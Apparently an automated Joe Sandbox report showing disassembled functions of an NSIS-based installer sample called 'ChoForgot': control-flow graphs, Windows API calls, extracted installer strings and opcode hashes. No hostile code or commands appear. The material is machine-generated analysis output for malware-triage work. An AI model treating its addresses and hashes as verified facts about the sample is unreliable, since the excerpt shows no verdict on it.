                                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                                                        • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                                                        • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                                                        • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                                        • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                                                        • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                                                        • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                                                                                                                                                        Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 825 406301-406315 FindFirstFileW 826 406322 825->826 827 406317-406320 FindClose 825->827 828 406324-406325 826->828 827->828
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                        • String ID: jF
                                                                                                                                                                                                                                                                                                        • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                                                        • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                        • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                                                                        Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 310444273-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                                                                                                                                                                                                                                        Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                                        • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                                                        • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                                                        • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                                                        • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                                        • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                                                        • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                                                        • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                                                        • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                                        • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                                                        • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                                                        • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                                                        • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                                                        • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                                        • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                                                                                                                                                                                                                                        Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                                                        • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                                                        • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                                        • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                                                                                                                                                                                                                                                        Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
